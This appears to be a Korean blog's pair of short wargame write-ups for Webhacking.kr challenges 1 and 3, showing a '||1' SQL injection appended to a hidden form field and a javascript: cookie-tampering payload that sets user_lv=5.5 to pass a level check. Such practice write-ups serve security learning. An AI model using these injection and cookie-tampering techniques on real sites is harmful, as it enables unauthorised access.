Webhacking.kr 3번 Security/Wargame 2014.06.27 01:54








gogo







크롬 개발자 도구

<form method="post" action="index.php"><input type="hidden" name="answer" value="1010100000011100101011111">name : <input type="text" name="id" maxlength="10" size="10"><input type="submit" value="write"></form>


히든 필드 벨류값에 ||1 추가 후 전송




name : admin
answer : xxx_xxx_xxxxxxxxx
ip : localhost



Clear.

'Security > Wargame' 카테고리의 다른 글

Webhacking.kr 3번  (0) 2014.06.27
webhacking.kr 1번  (0) 2014.06.27
트랙백0 , 댓글0
webhacking.kr 1번 Security/Wargame 2014.06.27 01:46

<?

$password="????";

if(eregi("[^0-9,.]",$_COOKIE[user_lv])) $_COOKIE[user_lv]=1;

if($_COOKIE[user_lv]>=6$_COOKIE[user_lv]=1;

if($_COOKIE[user_lv]>5) @solve();

echo("<br>level : $_COOKIE[user_lv]");

?>


javascript:alert(document.cookie="user_lv=5.5")



Clear.


'Security > Wargame' 카테고리의 다른 글

Webhacking.kr 3번  (0) 2014.06.27
webhacking.kr 1번  (0) 2014.06.27
트랙백0 , 댓글0